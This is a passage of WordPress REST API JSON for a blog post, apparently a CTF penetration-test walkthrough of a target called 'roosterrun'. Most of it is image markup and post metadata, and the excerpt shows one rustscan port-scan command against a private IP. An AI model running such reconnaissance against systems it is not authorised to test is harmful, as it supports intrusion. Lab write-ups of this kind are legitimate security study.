class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404051840374.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404051840374.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240405183950641\" style=\"zoom:50%;\" \/><\/div><\/p>\n","protected":false},"excerpt":{"rendered":"<p>roosterrun \u4fe1\u606f\u641c\u96c6 \u7aef\u53e3\u626b\u63cf rustscan -a 172.20.10.3 &#8212; -A PORT [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24,18],"tags":[],"class_list":["post-507","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-penetration-test","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/507","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=507"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/507\/revisions"}],"predecessor-version":[{"id":508,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/507\/revisions\/508"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=507"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=507"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=507"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}